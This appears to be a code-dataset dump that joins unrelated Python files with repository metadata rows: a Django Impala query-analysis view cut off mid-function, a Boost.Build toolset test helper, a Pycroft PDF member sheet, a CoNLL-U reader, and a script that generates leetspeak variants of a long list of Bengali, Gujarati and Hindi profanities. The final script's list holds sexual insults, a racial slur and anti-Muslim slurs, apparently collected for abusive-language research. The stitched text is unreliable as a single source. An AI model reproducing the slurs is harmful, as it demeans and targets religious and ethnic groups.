snippets = doc.data_dict.get('snippets', [])
secret = snippets[0]['result']['handle']['secret']
impala_query_id = unpack_guid(base64.decodestring(secret))
query_profile = api.get_query_profile_encoded(impala_query_id)
profile = analyzer.analyze(analyzer.parse_data(query_profile))
ANALYZER.pre_process(profile)
result = ANALYZER.run(profile)
heatmap = {}
summary = analyzer.summary(profile)
heatmapMetrics = ['AverageThreadTokens', 'BloomFilterBytes', 'PeakMemoryUsage', 'PerHostPeakMemUsage', 'PrepareTime', 'RowsProduced', 'TotalCpuTime', 'TotalNetworkReceiveTime', 'TotalNetworkSendTime', 'TotalStorageWaitTime', 'TotalTime']
for key in heatmapMetrics:
metrics = analyzer.heatmap_by_host(profile, key)
if metrics['data']:
heatmap[key] = metrics
response['data'] = { 'query': { 'healthChecks' : result[0]['result'], 'summary': summary, 'heatmap': heatmap, 'heatmapMetrics': sorted(list(heatmap.keys())) } }
response['status'] = 0
return JsonResponse(response)
def alanize_metrics(request):
response = {'status': -1}
cluster = json.loads(request.POST.get('cluster', '{}'))
query_id = json.loads(request.POST.get('query_id'))
api = _get_api(request.user, cluster=cluster)
if query_id:
LOG.debug("Attempting to get Impala query profile for query ID: %s" % (query_id))
query_profile = api.get_query_profile_encoded(query_id)
profile = analyzer.analyze(analyzer.parse_data(query_profile))
ANALYZER.pre_process(profile)
metrics = analyzer.metrics(profile)
response['data'] = metrics
response['status'] = 0
return JsonResponse(response)
@require_POST
@error_handler
def alanize_fix(request):
response = {'status': -1}
cluster = json.loads(request.POST.get('cluster', '{}'))
fix = json.loads(request.POST.get('fix'))
start_time = json.loads(request.POST.get('start_time'), '-1')
if fix['id'] == 0:
notebook = make_notebook(
name=_('compute stats %(data)s') % fix,
editor_type='impala',
statement='compute stats %(data)s' % fix,
status='ready',
last_executed=start_time,
is_task=True,
compute=cluster
)
response['details'] = { 'task': notebook.execute(request, batch=True) }
response['status'] = 0
return JsonResponse(response)
| 35.841026
| 241
| 0.742882
|
b1164bfa00c99fd7f2e852504c7c43d111bd6d12
| 307
|
py
|
Python
|
orcinus/workspace/__init__.py
|
orcinus-lang/orcinus-bootstrap
|
3a4766f05a21ca5d4cd6384d1857ec1ffaa09518
|
[
"MIT"
] | null | null | null |
orcinus/workspace/__init__.py
|
orcinus-lang/orcinus-bootstrap
|
3a4766f05a21ca5d4cd6384d1857ec1ffaa09518
|
[
"MIT"
] | null | null | null |
orcinus/workspace/__init__.py
|
orcinus-lang/orcinus-bootstrap
|
3a4766f05a21ca5d4cd6384d1857ec1ffaa09518
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2019 Vasiliy Sheredeko
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
from orcinus.workspace.workspace import Workspace
from orcinus.workspace.document import Document
from orcinus.workspace.package import Package
| 34.111111
| 63
| 0.814332
|
92408d38f525122ba9b2a170f7deb0a1f44ce952
| 4,232
|
py
|
Python
|
deps/boost/tools/build/test/TestToolset.py
|
alexhenrie/poedit
|
b9b31a111d9e8a84cf1e698aff2c922a79bdd859
|
[
"MIT"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
deps/boost/tools/build/test/TestToolset.py
|
alexhenrie/poedit
|
b9b31a111d9e8a84cf1e698aff2c922a79bdd859
|
[
"MIT"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
deps/boost/tools/build/test/TestToolset.py
|
alexhenrie/poedit
|
b9b31a111d9e8a84cf1e698aff2c922a79bdd859
|
[
"MIT"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
#!/usr/bin/python
#
# Copyright 2017 Steven Watanabe
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# validates a toolset using a mock of the compiler
import BoostBuild
import os
import re
import sys
renames = {"debug": "variant=debug", "release": "variant=release"}
def set_default_target_os(os):
global removed
global default_target_os
default_target_os = os
removed = set()
removed.add("target-os=" + default_target_os)
def adjust_property(property):
global renames
if property in renames:
return renames[property]
else:
return property
def adjust_properties(properties):
global removed
return [adjust_property(p) for p in properties if p not in removed]
def has_property(name, properties):
return name in [re.sub("=.*", "", p) for p in properties]
def get_property(name, properties):
for m in [re.match("(.*)=(.*)", p) for p in properties]:
if m and m.group(1) == name:
return m.group(2)
def get_target_os(properties):
return get_property("target-os", properties) or default_target_os
def expand_properties(properties):
result = properties[:]
if not has_property("variant", properties):
result += ["variant=debug"]
if not has_property("threading", properties):
result += ["threading=single"]
if not has_property("exception-handling", properties):
result += ["exception-handling=on"]
if not has_property("link", properties):
result += ["link=shared"]
if not has_property("rtti", properties):
result += ["rtti=on"]
if not has_property("runtime-link", properties):
result += ["runtime-link=shared"]
if not has_property("strip", properties):
result += ["strip=off"]
if not has_property("target-os", properties):
result += ["target-os=" + default_target_os]
return result
def compute_path(properties, target_type):
path = ""
if "variant=release" in properties:
path += "/release"
else:
path += "/debug"
if has_property("address-model", properties):
path += "/address-model-" + get_property("address-model", properties)
if has_property("architecture", properties):
path += "/architecture-" + get_property("architecture", properties)
if "cxxstd=latest" in properties:
path += "/cxxstd-latest-iso"
if "exception-handling=off" in properties:
path += "/exception-handling-off"
if "link=static" in properties:
path += "/link-static"
if "rtti=off" in properties:
path += "/rtti-off"
if "runtime-link=static" in properties and target_type in ["exe"]:
path += "/runtime-link-static"
if "strip=on" in properties and target_type in ["dll", "exe", "obj2"]:
path += "/strip-on"
if get_target_os(properties) != default_target_os:
path += "/target-os-" + get_target_os(properties)
if "threading=multi" in properties:
path += "/threading-multi"
return path
def test_toolset(toolset, version, property_sets):
t = BoostBuild.Tester()
t.set_tree("toolset-mock")
# Build necessary tools
t.run_build_system(["-sPYTHON_CMD=%s" % sys.executable], subdir="src")
set_default_target_os(t.read("src/bin/target-os.txt").strip())
for properties in property_sets:
t.set_toolset(toolset + "-" + version, get_target_os(properties))
properties = adjust_properties(properties)
def path(t):
return toolset.split("-")[0] + "-*" + version + compute_path(properties, t)
os.environ["B2_PROPERTIES"] = " ".join(expand_properties(properties))
t.run_build_system(["--user-config="] + properties)
t.expect_addition("bin/%s/lib.obj" % (path("obj")))
if "link=static" not in properties:
t.expect_addition("bin/%s/l1.dll" % (path("dll")))
else:
t.expect_addition("bin/%s/l1.lib" % (path("lib")))
t.expect_addition("bin/%s/main.obj" % (path("obj2")))
t.expect_addition("bin/%s/test.exe" % (path("exe")))
t.expect_nothing_more()
t.rm("bin")
t.cleanup()
| 34.688525
| 87
| 0.643195
|
efb77a7eafa9170dbb9fbb67e090ca9c7a81dd5a
| 4,246
|
py
|
Python
|
pycroft/helpers/printing/__init__.py
|
marcelb98/pycroft
|
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
|
[
"Apache-2.0"
] | null | null | null |
pycroft/helpers/printing/__init__.py
|
marcelb98/pycroft
|
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
|
[
"Apache-2.0"
] | null | null | null |
pycroft/helpers/printing/__init__.py
|
marcelb98/pycroft
|
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 The Pycroft Authors. See the AUTHORS file.
# This file is part of the Pycroft project and licensed under the terms of
# the Apache License, Version 2.0. See the LICENSE file for details.
from io import BytesIO
from os.path import dirname, join
from reportlab.lib.colors import black
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import StyleSheet1, ParagraphStyle
from reportlab.lib.units import cm
from reportlab.platypus import SimpleDocTemplate, Paragraph, Image, Table
from reportlab.platypus.flowables import HRFlowable
ASSETS_DIRECTORY = join(dirname(__file__), 'assets')
ASSETS_LOGO_FILENAME = join(ASSETS_DIRECTORY, 'logo.png')
def generate_user_sheet(user, user_id, plain_password):
"""Create a „new member“ datasheet for the given user
:param User user: A pycroft user
:param str user_id: The user's ID. It has to be given extra,
because the user_id is not appearent given the ORM object
itself; encoding is done in the library.
:param str plain_password: The password
"""
# Anlegen des PDF Dokuments, Seitengröße DIN A4 Hochformat)
buf = BytesIO()
pdf = SimpleDocTemplate(buf, pagesize=A4,
rightMargin=2 * cm,
leftMargin=2 * cm,
topMargin=2 * cm,
bottomMargin=2 * cm)
style = getStyleSheet()
story = []
im = Image(ASSETS_LOGO_FILENAME, 5 * cm, 5 * cm)
story.append(im)
story.append(HRFlowable(width="100%",
thickness=3,
color=black,
spaceBefore=0.8 * cm,
spaceAfter=0.8 * cm))
story.append(
Paragraph('Welcome as a member of the AG DSN, {}!'
.format(user.name),
style['BodyText']))
story.append(
Paragraph('We are proud to announce that your network access has been '
'activated. If you encounter any problems, drop us a mail or '
'visit us during our office hours. You can find contact '
'information at the bottom of this page.',
style['BodyText']))
story.append(
Paragraph('Please make sure to pay your membership contribution in time.'
' You can find further details on our web page.',
style['Bold']))
story.append(Paragraph('Wishing you all the best,', style['BodyText']))
story.append(Paragraph('Your AG DSN', style['BodyText']))
story.append(HRFlowable(width="100%",
thickness=3,
color=black,
spaceBefore=0.8 * cm,
spaceAfter=0.8 * cm))
ips = []
macs = []
for user_host in user.hosts:
for ip in user_host.ips:
ips.append(str(ip.address))
macs.append(ip.interface.mac)
data = [['Name:', user.name, 'User-ID:', user_id],
['Username:', user.login, 'IPv4-Address:', ', '.join(ips)],
['Password:', plain_password, 'MAC-Address:', ', '.join(macs)],
['E-Mail:', user.email, 'Location:', str(user.room)]]
t = Table(data, colWidths=[pdf.width * 0.15, pdf.width * 0.34] * 2)
story.append(t)
story.append(HRFlowable(width="100%", thickness=3, color=black, spaceBefore=0.8 * cm,
spaceAfter=0.8 * cm))
# PDF generieren und speichern
pdf.build(story)
return buf.getvalue()
def getStyleSheet():
"""Returns a stylesheet object"""
stylesheet = StyleSheet1()
stylesheet.add(ParagraphStyle(name='Normal',
fontName="Helvetica",
fontSize=10,
leading=12))
stylesheet.add(ParagraphStyle(name='BodyText',
parent=stylesheet['Normal'],
spaceBefore=14))
stylesheet.add(ParagraphStyle(name='Bold',
parent=stylesheet['BodyText'],
fontName="Helvetica-Bold"))
return stylesheet
| 37.575221
| 89
| 0.567358
|
0fcc2697886a24660e92a7e6887ef1e536696469
| 3,941
|
py
|
Python
|
pytreex/block/read/conllu.py
|
leotilli/pytreex
|
a40bfb9f33ffdb931993b30879830f1c898f1414
|
[
"Apache-2.0"
] | null | null | null |
pytreex/block/read/conllu.py
|
leotilli/pytreex
|
a40bfb9f33ffdb931993b30879830f1c898f1414
|
[
"Apache-2.0"
] | null | null | null |
pytreex/block/read/conllu.py
|
leotilli/pytreex
|
a40bfb9f33ffdb931993b30879830f1c898f1414
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
#
# Block for reading CoNLL-U files
#
from __future__ import absolute_import
from __future__ import unicode_literals
from pytreex.core.block import Block
from pytreex.core import Document
from pytreex.core.exception import LoadingException
from pytreex.core.util import file_stream
import re
from pytreex.core.log import log_info
__author__ = "Martin Popel"
__date__ = "2015"
class ReadCoNLLU(Block):
"""\
Reader for CoNLL-U format used in Universal Dependencies
https://universaldependencies.github.io/docs/format.html
"""
def __init__(self, scenario, args):
"""\
Constructor, checks if language is set and selects encoding according
to args, defauts to UTF-8.
"""
Block.__init__(self, scenario, args)
if self.language is None:
self.language = 'unk'
self.encoding = args.get('encoding', 'UTF-8')
def process_document(self, filename):
"""\
Read a CoNLL-U file and return its contents as a Document object.
"""
fh = file_stream(filename, encoding=self.encoding)
doc = Document(filename)
bundle = doc.create_bundle()
zone = bundle.create_zone(self.language, self.selector)
root = zone.create_atree()
last_node = root
nodes = [root]
parents = [0]
comment = ''
for line in fh:
# Strip newline character (\n or \r\n)
line = line.rstrip('\r\n')
# Empty line as a end of sentence
if not line:
# Ignore (multiple) empty lines before start of sentence (invalid CoNLL-U)
if len(nodes)==1:
continue
# Rehang to correct parents and save nonempty comment to root
for i in xrange(1,len(nodes)):
nodes[i].parent = nodes[parents[i]]
if len(comment):
zone.wild['comment'] = comment
# Prepare a new bundle
bundle = doc.create_bundle()
zone = bundle.create_zone(self.language, self.selector)
root = zone.create_atree()
last_node = root
nodes = [root]
parents = [0]
comment = ''
# Comment
elif line[0] == '#':
comment += line[1:] + "\n"
# A normal line with one token
else:
columns = line.split('\t')
# TODO: multi-word tokens
if '-' in columns[0]:
continue
# Create new node
new_node = root.create_child(data = dict(
(key, value) for key, value in
zip(['form', 'lemma', 'upos', 'xpos', 'feats', 'deprel', 'deps', 'misc'],
columns[1:6] + columns[7:10] )
if value is not None and value != '_'
) )
nodes.append(new_node)
try:
parent_index = int(columns[6])
except (ValueError, TypeError):
# TODO: warning?
parent_index = 0
parents.append(parent_index)
# Word order TODO is this needed?
new_node.shift_after_subtree(last_node)
last_node = new_node
# The last bundle should be empty (if the file ended with an empty line),
# so we need to remove it. But let's check it.
if len(nodes)==1:
doc.bundles.pop()
else:
for i in xrange(1,len(nodes)):
nodes[i].parent = nodes[parents[i]]
if len(comment):
zone.wild['comment'] = comment
fh.close()
return doc
| 32.841667
| 96
| 0.513575
|
7627e028ba2ba86e785e340f232f05c119e756c7
| 54,687
|
py
|
Python
|
synthetic data generation/DataGen.py
|
vivolscute/INDIAN_Bad_Words_Dataset
|
8f4ec1fdf9838994fe8e2cee995f5873ce4da572
|
[
"MIT"
] | 1
|
2021-06-15T19:01:19.000Z
|
2021-06-15T19:01:19.000Z
|
synthetic data generation/DataGen.py
|
vivolscute/INDIAN_Bad_Words_Dataset
|
8f4ec1fdf9838994fe8e2cee995f5873ce4da572
|
[
"MIT"
] | null | null | null |
synthetic data generation/DataGen.py
|
vivolscute/INDIAN_Bad_Words_Dataset
|
8f4ec1fdf9838994fe8e2cee995f5873ce4da572
|
[
"MIT"
] | null | null | null |
from itertools import product
from IPython.display import clear_output
REPLACE = {'a': '@', 'i': '*', 'o': '*', 'u': '*', 'v': '*',
'l': '1', 'e': '*', 's': '$', 't': '7'}
def Leet2Combos(word):
possibles = []
for l in word.lower():
ll = REPLACE.get(l, l)
possibles.append( (l,) if ll == l else (l, ll) )
return [ ''.join(t) for t in product(*possibles) ]
s = \
"""Chodon Boiraagi
Chodon Idli
chood
chudir bhai
Chudir Bhai
Chudir Pola
dan-da
dhon
dofla hetta
fatly
Fel
foga
foon, foondh
fungi
Futki
fuun-ga
gorur bachcha
gud
gud maranir beta
gud/guud
Guundaa
Haram jada
haram jadi
Hauwa
hetta muka ath bori dimo
hetta, bodha, shauwaa
Kalu
Calou
Kalou
Blackie
Keltu
Kelo
Kolo Toure
Djimi Traore
Kalo Hulo
Nigga
khanki
khanki chudi magir gude poka
khanki
maggi
khankir chele
Khankir Pola
khobis or goror khobis
Kuth-tar Bachcha
Kuthar Bacha
Kuththar
Baiccha Baich-cha
Kuttar Bhaccha
kuttar chod
Kuttar gu
laora
lerr
lerr kawrar fua
Maagi
Maal
maggir putt
Moga choder bacha
mother chod
Muta kuta
nankta kuttar baccha
Nunu
nunu
pagol sagol
Pagul
pasa
podmarani
Sagul
Shauwa
shuorer baccha
Shurur Batcha
Suda-sudi
SUDAURIER FURII
SUDAURY
Suourer bachcha
SUTHH-MAROUNY
thor hetta laythum
thor maa suda
thor maar bothoy kha
thore astha gao eh sudeh
thumar futki marthum
nunu
Thuuii Bandhorr
Thuuii Gaadhaa
to-mar ma hetta
Tor baaf fel Khai
Tor Bafor Boga Saat
tor ma amar fell
tor ma boga cha
Tor Maa
tor maa booni nay
tor maa ke chudi
Tor mayere chudi
Tor nanire chudi
tor nunu bouut boro
Tor pasha mota
tu ekta bandar
Tur booga sooto
tur mar booni khaa
tuy ath marros
Vogchod
Bain Chod
Bainchod
Bassa Shouko
chodnar po
Gud-marani
hagoo
Hijra
Hoga
Khankir pola
Kuthaar Baicha
Kuttar Bachcha
kuttar bachcha
Leura
Magi
Mai
makhal
muri kha
Noakhailla
randi magi
khai lai moo
bosoi khai see
Tomar maar putkey fatamu .
Tor babar bichi fatabo
Tor mar sawa kha
tor mare chudi
tur ma amar fel be
Aanguli kora
achuda
ads
Ami tor maa ke chudmu
baal
Baal chhero
Bara
Beissha Magir Pola
Bhag
Bhoda
Bokachoda
boltu chire felbo
botoi khowra
Choda
Chood
Chudanir pola
Chudi
Chudmu tor pasai sneha
Chumban
Chumu
Dhon
Dhon khecha
Gaand Maarano
Gud
Humaira
Khanki
khanki Magi
khankir pola
kuttar Baccha
lehr kawrar bachha
Mang
Naang
pod marani
Pond
Shetar bal
Shishna
Sohail
Thor heta muka ath boridimu
Tor Gaar Maari
Tor maa ke chudi
tor mar vhoda
tumi bal hagu koro!!
Vuuski magi
Aar
bahanchod
baila
baklol
bapjeth
bawaseer ho kya
bhadwa
bhethi
bhosda
bhosri wali
boor
Boor ka baal
burbak
chhinar
chhota chetan
chuchi
chutmuha
dogla
gaar marao
gaar maraye duniya
gaar me daal le
gadchat
jhatwa
kiski maiyaa kutta biyayi
laar
laar chato
laar lega
larchat
maa chudao
muth
randi ka bachha
randikhana
ravi kumar patel
tori bahin ke chodu
tori maiyaa ke chodu
maari tatoori ne chalay
Akbaruddin Owaisi
Alloo Bhosri Chaat
Anuj
Babhuchak
bai no bhosdo
bein chod
Benchod
Bhadvo
bhenchod
Bhoot
Bhopa
Bhos marina
Bhosad Pappu
bhosdo
bhosrini
bobla
Bobla Vagarni Baydi
Bosrichord
bosrina
Buckwass
Budhalal
chafu gaan
Chichi
Chod
Chod ami
Chodhru
chodkanya
Chodu
chupri lauri
Chutiya
Darshil
Dheela Lund Ni Olaad
Eapen
Fattu
gaan tari
Gaand Ghapli
Gaand Ma Ghal
gaandina, gandina
Gand nu kaanu
gandi chodina
gando
Gando salo
gel ghagharina
Ghel Chodyo
Ghelchoydi
Halki Raand na
Harsh Dalal
harshit
hopa
Huzefa
jaaro
Jhadhino!
karo loro
kem chho
kutari
Lakhota
Land
loda
lodde mari
Lowroh
luli
Lund Bhagat
Maa ne ghat bhosdina
maajaddha
maari tatoori ooper bess
maasi chodamno
Madachod
madachod
mandi susee
Manik
mara man no lado
mari bhosri chaat
meri gaan chatt
Mohit
Moht
mota jijah
nago choido
Nakhodiya
pikina
Pikina
pim pim
poom poom
Priyanshu
puchi chod
Puti
raand
rumana
sali
salu gut`ti
Sandas
suwwar jewu dachu
taari bai no aghano
Tara baap ni gaan
Taree gaar ma lowroh
bhosri
tari bosri
tari dagri
tari gaand
bulbla
tari ma ne
tari ma ni putti
tari maani putli
tari ma no poplo
Tari maa na babla
Tari maa na bhosda
maro lodo
Tari maa ne chodu
Tari maa ni taturi
tari mai ni gand
tere ma nu hinta kar
teree maa gaderi
Thari Ma Ni Ghaan
Tusat
nirodh
bahan ke lawde
Bawali gand
Bhen ke dine
chudhu ke chodde
Dhi ke lawde
Dhichod
bhoor
chuttar
chuttari
gand chod
Ghunt Fala
Jhulaniya
Madhar chod
shivom lal
teri maichod
katela lund
bhadvi
rand
madharchod
chut
chut ke baal
chut ke dhakkan
chut maarli
chutad
chutadd
chutan
chutia
chutiya
gaand
gaandfat
gaandmasti
gaandufad
gandu
gashti
gasti
ghassa
ghasti
harami
haramzade
hawas
hawas ke pujari
hijda
hijra
jhant
jhant chaatu
jhant ke baal
jhantu
kamine
kaminey
kanjar
kutta
kutta kamina
kutte ki aulad
kutte ki jat
kuttiya
loda
lodu
lund
lund choos
lund khajoor
lundtopi
lundure
maa ki chut
maal
madar chod
mooh mein le
mutth
najayaz
najayaz aulaad
najayaz paidaish
paki
pataka
patakha
raand
randi
saala
saala kutta
saali kutti
saali randi
suar
suar ki aulad
tatte
tatti
bhosada
boba
chusu
chut
tharak
tharki
bsdk
mc
bsdk
hutiye
chakka
randwe
randve
chutiye
madarjaat
lomda
chumtiya
chumtiye
chus
tatto
goti
gotiya
gand
chuut
chodya
ke chode
chode
chodyu
boba
kutta
fakir
Jaan var
Kutta
Kuttiya
Khota
Khotey ki aulad
Kutte ki jat
Najayaz
Najayaz paidaish
Saala kutta
Saali kutti
Soover
Tatti
Bahen Chod
Bahen ke laude
Bahen ke takke
Beti Chod
Bhai Chod
Bhains ki aulad
Jhalla, Faggot
Jhant ke baal
Jhaant ke pissu
Kutte ka aulad
Kutte ke tatte
Maadher chod
Padma
Raand ka jamai
Randhwa
randwa
Rundi
Rundi ka bacha
Rundi Ki bachi
Soower ke bachche
Ullu ke pathe
Bandaa
Booblay
BhonsRi-Waalaa
Carrom board
Chhed
Chut
Chut marike
Chodu
Chodra
Choochii
Gaandu
Gaand
Ing ge pan di kut teh
LavDa
Lavde
Lund
Lavde ke bal
Lavander
Mangachinamun
Muth mar
Nimbu sharbat
Maa ke bable
Mammey mumm-aye
Tatte Masalna
Toto
Toota hua lund
Backar chodu
Bhand khau
Bhandwe ki aulad
Bhosad Chod
Bumchod
Bur ki chatani
Cuntmama
chut ke pasine
gaand ke pasine
jhaat ke baal
Chippkali ke
jhaant
Chodela
Chodu bhagat
Chhola Phudakna
Chudan chudai
Chudai khana
Chunni
Choot ka baal
Choot ke bhoot
Chut ke dhakkan
Chut mari ke
Choot marani ka
Chut ke pasine
Chup Ke Chut Hai
Gaandu
Gaandfat
Gaandmasti
Gaand ka makhan
Gaand marau
Ghondoo
Jhant chaatu
Jhaat ka bhaaji
Kutte ka beej
Lund choosu
Lund fakeer
Lundoos
Lund ka shorba
Land ka bheja
Lund pe chad ja
Lund pe thand hai
Lund Ke Pasine
Lavde ke baal
Maa ke bhadwe
Muth maar
Parichod
Pucchi
Raandi baajer
Rundi ko choud
Rubber bhosda
Sadi hui gand
Apna land choos
Chinaal
muth
Gand Ka Khatmal
Gandkate Kutte
Gaand mein bambu
Gaand main lassan
Gaand main danda
Gaand main keera
Jaa Apni Bajaa
chuttiya
Choot
Jhaat
teri maa ki choot
Lund Chus
Ma chudi
liya tha
chunni choos
lund choos
Chuus Maro
Raand
Rundi
chod
lauda
Chodhunga
Ka Lund
Teri Jhanten
gandi
gadha ka lund
Teri maa ka bhosda
chute
Tere mai ki chut
chodun.
chut
chode
Tor mai ke chodho
jaanvar
kutta
kutiya
khota
auladheen
jaat
najayaz
gandpaidaish
saala
kutti
soover
tatti
potty
behnchodon
behnchod
behenchod
behenchodd
bahenchod
bahanchod
bahencho
bancho
sali
bahenke
laude
takke
betichod
bhaichod
bhains
jhalla
jhant
nabaal
pissu
kutte
maderjat
madherchod
maderchod
madaarchod
madarjaat
maachod
madharchod
maderchodo
machod
maadherchod
madarchodon
madarchodd
madarchod
maadarchod
padma
raand
jamai
randwa
randi
bachachod
bachichod
soower
bachchechod
ullu
pathe
banda
booblay
booby
suar
buble
rand
babla
bhonsriwala
bhonsdiwala
ched
chut
chod
chodu
chodra
choochi
chuchi
gaandu
gandu
gaand
lavda
lawda
lauda
lund
balchod
lavander
muth
maacho
mammey
tatte
toto
toota
backar
bhandwe
bhosadchod
bhosad
bumchod
bum
bur
chatani
cunt
cuntmama
chipkali
sale
pasine
jhaat
chodela
bhagatchod
chhola
chudai
chudaikhana
chunni
choot
bhoot
dhakkan
bhajiye
fateychu
gandnatije
lundtopi
gaandu
gaandfat
gaandmasti
makhanchudai
gaandmarau
gandu
gand
chaatu
beej
choosu
fakeerchod
lundoos
shorba
binbheja
bhadwe
parichod
nirodh
pucchi
baajer
choud
bhosda
sadi
choos
maka
chinaal
gadde
joon
chullugand
doob
khatmal
gandkate
bambu
lassan
danda
keera
keeda
hazaarchu
paidaishikeeda
kali
safaid
poot
behendi
chus
machudi
chodoonga
baapchu
laltern
suhaagchudai
raatchuda
kaalu
neech
chikna
meetha
beechka
jihaadi
chooche
patichod
rundi
makkhi
biwichod
chodhunga
haathi
kute
jhanten
kaat
gandi
gadha
bimaar
badboodar
dum
raandsaala
phudi
chute
kussi
khandanchod
ghussa
maarey
chipkili
unday
budh
chaarpai
chodun
chatri
chode
chodho
mulle
mulli
musalman
momedan
katua
chutiyapa
bc
mc
chudwaya
kutton
lodi
loda
jungli
vahiyaat
jihadi
atankvadi
atankwadi
aatanki
aatankwadi
Beti Chod
Bhai Chod
Bhains ki aulad
Jhalla, Faggot
Jhant ke baal
Jhaant ke pissu
Kutte ka aulad
Kutte ke tatte
Maadher chod
Padma
Raand ka jamai
Randhwa
randwa
Rundi
Rundi ka bacha
Rundi Ki bachi
Soower ke bachche
Ullu ke pathe
Hindi Dirty Words
Bandaa
Booblay
BhonsRi-Waalaa
Carrom board
Chhed
Chut
Chut marike
Chodu
Chodra
Choochii
Gaandu
Gaand
Ing ge pan di kut teh
LavDa
Lavde
Lund
Lavde ke bal
Lavander
Mangachinamun
Muth mar
Nimbu sharbat
Maa ke bable
Mammey mumm-aye
Tatte Masalna
Toto
Toota hua lund
Hindi Profane Words
Backar chodu
Bhand khau
Bhandwe ki aulad
Bhosad Chod
Bumchod
Bur ki chatani
Cuntmama
Chodela
Chodu bhagat
Chhola Phudakna
Chudan chudai
Chudai khana
Chunni
Choot ka baal
Choot ke bhoot
Chut ke dhakkan
Chut mari ke
Choot marani ka
Chup Ke Chut Hai
Gaandu
Gaandfat
Gaandmasti
Gaand ka makhan
Gaand marau
Ghondoo
Jhant chaatu
Jhaat ka bhaaji
Kutte ka beej
Lund choosu
Lund fakeer
Lundoos
Lund ka shorba
Land ka bheja
Lund pe chad ja
Lund pe thand hai
Lund Ke Pasine
Lavde ke baal
Maa ke bhadwe
Muth maar
Parichod
Pucchi
Raandi baajer
Rundi ko choud
Rubber bhosda
Sadi hui gand
Apna land choos
Apni ma ko ja choos
Gand Ka Khatmal
Gandkate Kutte
Gaand mein bambu
Gaand main lassan
Gaand main danda
Gaand main keera
Hazaar lund teri gaand main
Jaa Apni Bajaa
Lund Chus
Ma chudi
Mera chunni choos
Meri lund choos
Mere Chuus Maro
choot
chooche
bhosda
chute
chode
chodho
aand
aandal
aandu
aandupana
apni lund choos
apni ma ko ja choos
backarchodu
badboodar choot
badir
badirchand
bahen chod
bahen ka loda
bahen ke laude
bahen ke takke
bahen ki choot
bahenchod
bahinchod
bahnchod
bakland
bakri chod
bakwaas
ban chod
banchod
banchood
bandaa
bandhar
ben chod
benchod
beti chod
bhadhava
bhadkhau
bhadwa
bhadwe ka awlat
bhai chod
bhains ki aulad
bhan chhod
bhanchod
bhandava
bhen chod
bhen ke laude
bhen ke takke
bhenchod
bhenchodd
bhonsri-waalaa
bhosad chod
bhosadike
bhosdaa very
bhosdi ka
bhosdi wala
bhosdika
bol teri gand kaise maru
booblay
buddha khoosat
buhtah-nee ka
bumchod
bund
bund maraa le
bur
bur ki chatani
carrom board
char soh bis
chhaati
chhed
chhola phudakna
chinaal
chinaal ke gadde ke nipple ke baal ke joon
chipkali ke chut ke pasine
chipkali ke gaand ke pasine
chipkali ke jhaat ke baal
chipkali ke jhaat ke paseene
chipkali ki bhigi chut
chodela
chodnaa to fuck
chodra
chodu
chodu bhagat
choochi
choochii
choot
choot ka baal
chootad
chootadchod
chootia
chootiya
chootiyapa
chootiyapanti
chudaai
chudaai khaani
chudai
chudai khana
chudan
chudi
chudwana
chull uthna
chunni
chusnawal
chusnawala
chut
chut ka bhoot
chut ka pujari
chut ke dhakkan
chut ke gulam
chut ke pasine
chut marike
chutan
chutia
chutiya
chutiyapa
cuntmama
dhee chod
dhee ka lund
dheela lund
fate condom ka natije
fuddi pussy
gaand
gaand asshole (definition)
gaand ka makhan
gaand maarna to fuck in the ass
gaand main danda
gaand main keera
gaand main lassan
gaand marau
gaand marna
gaand mein bambu
gaandfat
gaandkate kutte
gaandmasti
gaandu
gaandu asshole (person)
gashti
gastee
gasti
ghassad
ghasti
ghelchodia
goti
gotiyan
gpl (gaand pe laat)
gundmaraa ass fucked (man)
gundmari ass fucked (lady)
haraam ka chuda son of unknown father
haraam ki chudi fucked by someone other then husband.
haraam zaada
haraami
haraamjaada son of unknown father
haraamjaadi daughter
haraamkhor
hijda
hijdaa
hijde
hijra
hug
ing ge pan di kut teh
januwar
jhaant
jhaant ka baal
jhaant ke pissu
jhaant ukhaadna
jhaat chaatu
jhaat ka bhaaji
jhalla
jhant ke baal
jhat ke baal
kaamchor
kadak maal
kali choot ke safaid jhaat
kali chut ka safaid jhaat
kamina
katla
khade lund pe dhoka
khasmanu khaani
khota
khotey ki aulad
khotey ki aulda
klpd
kutchudi
kuthi for girl
kutiya
kutiya ke pilley
kutte ka aulad
kutte ka awlat
kutte ka beej
kutte ka lund
kutte ke pilley
kutte ke poot
kutte ke tatte
kutte ki jat
kuttiya
kya kadak hai ye
kya maal hai ye
ladkichod
landait
lavander
lavda
lavde
lavde ke baal
lavde ke bal
loda
lodu
londiyachod
lund
lund choos
lund choosu
lund chus
lund fakeer
lund fakir
lund ka bheja
lund ka shorba
lund ke pasine
lund pe chad ja
lund pe thand hai
lund
lundoos
lundtopi
ma chudi
maa chudaa
maa ka bhosda
maa ke bable
maa ke bhadve
maa ke bhadwe
maa ke laude
maa ki choot
maa ki chut
maa ki phudi
maachod
maa-chod
maa-chut
maadarchod
maadher chod
maakichut
maal semen
mader chod
maha gaandu
mammey
mangachinamun
mast maal
momme
moot
mutar
muth maar
muth mar
muth marna
mutthal
na chhot
najayaz
najayaz paidaish
netrachodan mat kar
nimbu sharbat
paad
paadu kaun
paagal choda
padma
pancho
parichod
phatele nirodh ke natije
pisaab
pucchi
raand
raand ka jamai
raand ka pati
raandi baajer
raapchik
rakhail
rand chod
randhwa
randwa
rubber bhosda
rundee
rundi
rundi apni chut leka ana
rundi ka bacha
rundi khana
rundi ki bachi
rundi ko chowd
saala
saala kutta
saali kutti
sadi hui gaand
sali kuta
sali kutti
seal bund
seal pack virgin
sewwer ki bachi
soover
soower ke bachche
suwwar
suwwar ka bachcha
suwwar ke lund
